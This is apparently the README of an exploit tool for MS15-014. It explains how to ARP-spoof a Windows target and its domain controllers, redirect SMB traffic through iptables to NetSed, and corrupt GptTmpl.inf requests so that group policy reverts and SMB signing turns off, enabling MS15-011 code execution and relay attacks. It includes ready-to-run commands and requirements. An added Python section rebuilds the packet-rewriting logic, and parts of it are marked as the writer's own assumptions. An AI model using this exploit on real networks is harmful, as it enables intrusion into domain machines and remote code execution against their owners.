On a vulnerable, domain-joined version of Windows, if part of the GPO update fails, the group policy settings revert to their defaults and show a value of "Not Defined". This has multiple security impacts; two high-value concerns are:
- SMB signing for the SMB server is OFF by default, except on DCs.
- SMB signing for the network client is OFF by default. This is what makes MS15-014 exploitable.
For an in-depth explanation of the vulnerabilities and exploit scenarios, refer to the F-Secure and ADSecurity links in the References section below.
Successful exploitation of MS15-014 allows MS15-011 to be exploited, which can lead to remote code execution. Because Windows machines have SMB signing for the network client OFF by default, MS15-014 is not needed to exploit a system vulnerable to MS15-011 unless SMB signing for the network client has been enabled.
Additionally, MS15-014 can be used to disable SMB signing on the target's SMB server, which can then be targeted in relay attacks.
By default, GPO updates occur every 90 minutes plus a random offset of 0 to 30 minutes, so exploitation can take up to 120 minutes (2 hours) with default settings. Depending on the environment, the interval may have been modified to refresh more frequently, or much less frequently.

This exploit ARP-spoofs the target and the domain controller(s). It uses iptables to redirect all traffic destined for port 445 to port 446, where NetSed listens. NetSed then watches the SMB traffic for requests naming the file "\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf" and corrupts those packets. The GPO update fails, and the vulnerability is triggered.

During testing I reliably observed that exploitation succeeded after 4 corrupted packets. The packet capture sometimes showed up to 7 requests for this file, but exploitation had already succeeded after 4 corruptions. For this reason the script reports that it has likely completed after 4 and keeps waiting until 7 packets have been corrupted. If the corrupted count stays the same for 2-3 minutes, it is safe to assume the GPO update has completed, unless the network is extremely slow.
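The matching and corruption steps described above, as an added example that is not the ms15-014.py script itself: it reduces the logic to pure Python functions that can be exercised offline on a constructed SMB2 segment. The NetSed %XX escape syntax and the specific corruption strategy (rename the file to a same-length bogus name so the DC answers with a not-found error) are my assumptions about how such a tool works, not details taken from the page; the 4/7 thresholds and the 2-3 minute stall rule are the ones stated above.

```python
from __future__ import annotations

# Path of the security template inside a GPO, as the client requests it over SMB.
GPT_TMPL_PATH = r"\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"

LIKELY_DONE = 4      # corruptions after which the refresh was observed to fail
MAX_EXPECTED = 7     # most requests for the file seen during one refresh
STALL_SECONDS = 150  # 2-3 minutes with no new match: the refresh has ended


def utf16le_pattern(path: str) -> bytes:
    """SMB2 CREATE carries file names as UTF-16LE (no terminator), so a rule
    matching the ASCII string never fires; every character is followed by NUL."""
    return path.encode("utf-16-le")


def renamed_path(path: str, replacement_name: str) -> str:
    """Swap the final path component for a same-length bogus name.  Keeping the
    length equal leaves the SMB2 length fields valid, so only the name changes
    and the DC answers with a not-found error (assumed corruption strategy)."""
    head, _, name = path.rpartition("\\")
    if len(replacement_name) != len(name):
        raise ValueError("replacement must keep the file name length unchanged")
    return f"{head}\\{replacement_name}"


def netsed_rule(path: str, replacement_name: str = "XptTmpl.inf") -> str:
    """Build a NetSed 's/pattern/replacement' rule.  Every byte is written as a
    %XX escape (NetSed's hex syntax, as I understand it) because the UTF-16LE
    pattern is full of NUL bytes that cannot appear literally on a command line."""
    def esc(data: bytes) -> str:
        return "".join(f"%{b:02X}" for b in data)

    old = utf16le_pattern(path)
    new = utf16le_pattern(renamed_path(path, replacement_name))
    return f"s/{esc(old)}/{esc(new)}"


def corrupt_payload(payload: bytes, path: str = GPT_TMPL_PATH,
                    replacement_name: str = "XptTmpl.inf") -> tuple[bytes, bool]:
    """Return (payload, matched): the same rewrite netsed_rule() expresses,
    applied in Python so it can be tested on a captured or constructed segment."""
    old = utf16le_pattern(path)
    if old not in payload:
        return payload, False
    new = utf16le_pattern(renamed_path(path, replacement_name))
    return payload.replace(old, new), True


class CorruptionTracker:
    """Count corrupted requests and report when the refresh is probably over,
    following the 4-likely / 7-max / stall-after-2-3-minutes heuristic."""

    def __init__(self) -> None:
        self.count = 0
        self.last_hit: float | None = None

    def record(self, now: float) -> None:
        self.count += 1
        self.last_hit = now

    def status(self, now: float) -> str:
        if self.count >= MAX_EXPECTED:
            return "done"
        stalled = self.last_hit is not None and now - self.last_hit >= STALL_SECONDS
        if stalled:
            # No new requests for a while: the refresh ended.  With fewer than
            # LIKELY_DONE corruptions it may not have failed; watch the next cycle.
            return "done" if self.count >= LIKELY_DONE else "stalled"
        return "likely-done" if self.count >= LIKELY_DONE else "waiting"


def demo() -> dict[str, object]:
    """Run the pieces over a constructed SMB2 CREATE-like segment (not a capture):
    the SMB2 magic, filler, then the name exactly as a client encodes it."""
    segment = b"\xfeSMB" + b"\x00" * 60 + utf16le_pattern(GPT_TMPL_PATH) + b"\x00" * 4
    rewritten, hit = corrupt_payload(segment)
    ascii_only = b"\xfeSMB" + b"GptTmpl.inf"  # a client never sends the name this way
    _, ascii_hit = corrupt_payload(ascii_only)
    tracker = CorruptionTracker()
    for t in range(4):
        tracker.record(float(t))
    return {
        "rule_prefix": netsed_rule(GPT_TMPL_PATH)[:20],
        "matched": hit,
        "ascii_matched": ascii_hit,
        "same_length": len(rewritten) == len(segment),
        "after_four": tracker.status(3.0),
        "after_stall": tracker.status(3.0 + STALL_SECONDS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it stand-alone to see the rule prefix and the tracker states. The point a practitioner should take away is the encoding: a NetSed rule written against the ASCII file name would never match an SMB2 CREATE request, and a replacement of a different length would break the SMB2 length fields rather than just the name.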
The GPO refresh interval can be set as high as 64,800 minutes (45 days), plus a random offset of up to 1,440 minutes (24 hours). If a sysadmin has configured the maximum, exploiting MS15-014 and then MS15-011 could in theory take up to about 92 days (two full refresh cycles). Have fun waiting for that shell!
Example command, where 172.66.10.2 is the vulnerable target machine and 172.66.10.10 is the DC (multiple DCs are supported):
python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
With multiple DCs:
python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
Note: see the requirements below. This script modifies the PREROUTING chain of the iptables nat table and enables IP forwarding. Make sure to revert these settings after exploitation.
- ArpSpoof
- iptables
- NetSed
- Python3 and whatever libraries the script imports.
- This script does not work if Kerberos is required. Exploitation is still possible, but I won't be scripting that. The F-Secure link below describes the steps required when Kerberos is in use; it takes additional effort, including cracking Kerberos tickets or knowing user passwords.
- To target multiple hosts, either modify the script or run additional ArpSpoof commands.
- Revert the iptables changes before moving on to exploit MS15-011, or you might end up waiting another 45 days :P
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-011